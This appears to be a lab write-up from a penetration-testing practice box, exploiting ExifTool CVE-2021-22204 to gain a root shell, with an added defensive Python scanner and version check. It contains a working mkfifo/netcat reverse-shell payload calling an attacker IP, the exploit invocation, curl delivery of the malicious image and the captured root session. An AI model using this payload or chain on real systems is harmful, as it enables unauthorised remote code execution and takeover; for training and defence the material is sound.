CVE-2021-22204
The target's ExifTool installation is an older release and is likely vulnerable to CVE-2021-22204.
CVE-2021-22204 affects ExifTool 7.44 through 12.23 (fixed in 12.24) and is rated critical. The flaw sits in the DjVu file handler: user-controlled annotation data in a DjVu image is not neutralized before ExifTool processes it, so a crafted annotation ends up evaluated as Perl code (CWE-707, Improper Neutralization). Because ExifTool also parses DjVu data embedded inside other formats, the trigger can be delivered as a JPG. The result is arbitrary command execution as whichever user runs exiftool on the file, which affects confidentiality, integrity and availability.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ searchsploit -m linux/local/50911.py ; mv 50911.py CVE-2021-22204.py
Exploit: ExifTool 12.23 - Arbitrary Code Execution
URL: https://www.exploit-db.com/exploits/50911
Path: /usr/share/exploitdb/exploits/linux/local/50911.py
Codes: CVE-2021-22204
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/PEN-200/PG_PRACTICE/exfiltrated/50911.py
Exploit locally available
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ python3 CVE-2021-22204.py -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f' -i ~/Pictures/test.jpg
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
RUNNING: UNICORD Exploit for CVE-2021-22204
PAYLOAD: (metadata "\c${system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f')};")
RUNTIME: DONE - Exploit image written to 'image.jpg'
Running the exploit writes image.jpg: a JPEG carrying the DjVu annotation payload shown in the PAYLOAD line. Nothing happens until exiftool parses the file; when it does, the embedded system() call starts the reverse shell as the user invoking exiftool.
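As an added example (not code from the original page or from the exploit's author), the following Python implements the two checks a practitioner wants at this point: a version test against the range CVE-2021-22204 covers, and a scanner that walks any DjVu container embedded in an uploaded image and flags annotation chunks carrying the backslash-escape + ${...} shape seen in the PAYLOAD line above. The function names, the DjVu fixture builder and the sample uploads are all constructed for this example; the fixture is not a valid image, and the byte patterns are heuristics, not a substitute for upgrading ExifTool to 12.24 or later.

```python
"""Added example: pre-checks for CVE-2021-22204 (not code from the original page).

  1. is_vulnerable_version(): is a given ExifTool build in the affected range
     (7.44 through 12.23)?
  2. scan_upload(): does an uploaded image carry a DjVu annotation with the
     backslash-escape + ${...} shape the exploit emits, so the file can be
     rejected before any exiftool job (cron, thumbnailer, ...) touches it?
"""
import re
import struct
from typing import Iterator, List, Optional, Tuple

FIRST_VULNERABLE = (7, 44)   # CVE-2021-22204: affected from 7.44 ...
FIXED_IN = (12, 24)          # ... through 12.23; 12.24 fixed it

DJVU_MAGIC = b"AT&TFORM"     # start of a DjVu IFF container
# Inside an annotation chunk: a backslash escape (the exploit uses \c) followed
# directly by a Perl ${...} block, e.g. (metadata "\c${system('id')};")
ANT_INJECTION_RE = re.compile(rb"\\.\$\{")
# Stricter whole-file fallback for malformed containers: also require "(metadata"
# so random bytes in JPEG entropy-coded data do not trip it.
RAW_INJECTION_RE = re.compile(rb"\(\s*metadata\b[^)]*?\\.\$\{")


def parse_version(ver_output: str) -> Optional[Tuple[int, int]]:
    """Parse 'major.minor' out of `exiftool -ver` output such as '12.23'."""
    m = re.search(r"(\d+)\.(\d+)", ver_output)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_vulnerable_version(ver_output: str) -> bool:
    """True when the version lies in [7.44, 12.24)."""
    v = parse_version(ver_output)
    return v is not None and FIRST_VULNERABLE <= v < FIXED_IN


def iter_djvu_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (chunk_id, body) for each chunk of every DjVu FORM found in data.

    DjVu is IFF85: 'AT&T' 'FORM' <len:be32> 'DJVU' then chunks of
    <id:4> <len:be32> <body>, each body padded to an even offset.
    Truncated or bogus lengths simply end the walk instead of raising.
    """
    pos = 0
    while True:
        pos = data.find(DJVU_MAGIC, pos)
        if pos == -1 or pos + 16 > len(data):
            return
        form_len = struct.unpack(">I", data[pos + 8:pos + 12])[0]
        end = min(len(data), pos + 12 + form_len)
        cur = pos + 16                          # skip AT&T FORM <len> DJVU
        while cur + 8 <= end:
            cid = data[cur:cur + 4]
            clen = struct.unpack(">I", data[cur + 4:cur + 8])[0]
            yield cid, data[cur + 8:cur + 8 + clen]
            cur += 8 + clen + (clen & 1)        # pad to even
        pos = max(end, pos + len(DJVU_MAGIC))   # always make progress


def scan_upload(data: bytes) -> List[str]:
    """Return findings for an uploaded file; an empty list means nothing suspicious."""
    findings = []
    if DJVU_MAGIC in data and not data.startswith(DJVU_MAGIC):
        findings.append("DjVu container embedded inside a non-DjVu file")
    for cid, body in iter_djvu_chunks(data):
        if cid == b"ANTa" and ANT_INJECTION_RE.search(body):
            findings.append("ANTa annotation with escape+${...}: %r" % body[:60])
        elif cid == b"ANTz":
            # BZZ-compressed annotation: not inspectable here, so never pass it silently
            findings.append("ANTz (compressed) annotation present; cannot inspect")
    if not findings and RAW_INJECTION_RE.search(data):
        findings.append("(metadata ...${...}) sequence found outside a parsed ANTa chunk")
    return findings


def build_djvu_fixture(annotation: bytes) -> bytes:
    """Constructed test fixture (assumption: not a valid, viewable DjVu image):
    a minimal FORM with a dummy INFO chunk and one ANTa chunk."""
    def chunk(cid: bytes, body: bytes) -> bytes:
        pad = b"\x00" if len(body) & 1 else b""
        return cid + struct.pack(">I", len(body)) + body + pad
    inner = b"DJVU" + chunk(b"INFO", b"\x00" * 10) + chunk(b"ANTa", annotation)
    return b"AT&T" + b"FORM" + struct.pack(">I", len(inner)) + inner


# Constructed samples. The payload keeps the shape of the page's PAYLOAD line
# with a harmless command in place of the reverse shell.
PAYLOAD_SHAPE = b"(metadata \"\\c${system('id')};\")"
MALICIOUS_JPG = (b"\xff\xd8\xff\xe1\x00\x10Exif\x00\x00"
                 + build_djvu_fixture(PAYLOAD_SHAPE) + b"\xff\xd9")
BENIGN_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 64 + b"\xff\xd9"
BENIGN_DJVU = build_djvu_fixture(b'(metadata (Author "alice"))')

if __name__ == "__main__":
    for label, ver in (("target", "12.23"), ("patched", "12.24")):
        print(label, ver, "vulnerable" if is_vulnerable_version(ver) else "not affected")
    for label, blob in (("malicious", MALICIOUS_JPG), ("benign jpg", BENIGN_JPG),
                        ("benign djvu", BENIGN_DJVU)):
        print(label, scan_upload(blob) or "clean")
```

Two caveats worth keeping in mind when using something like this: ANTz chunks are BZZ-compressed, so the scanner flags them rather than pretending to inspect them, and a DjVu container inside a file that claims to be a JPEG is itself a reason to reject an upload even before looking at the annotation. The version check is the one that actually settles the question; the scanner only buys time until the upgrade lands.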
Exploitation
www-data@exfiltrated:/opt$ curl -s http://192.168.45.198/image.jpg -o /var/www/html/subrion/uploads/image.jpg
Delivery complete
pspy, running in the background on the target, captured the whole chain once the upload was picked up and processed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.202.163] 43530
bash: cannot set terminal process group (35438): Inappropriate ioctl for device
bash: no job control in this shell
root@exfiltrated:~# whoami
whoami
root
root@exfiltrated:~# hostname
hostname
exfiltrated
root@exfiltrated:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:aa:a9 brd ff:ff:ff:ff:ff:ff
inet 192.168.202.163/24 brd 192.168.202.255 scope global ens160
valid_lft forever preferred_lft forever
System-level compromise: root shell on exfiltrated (192.168.202.163)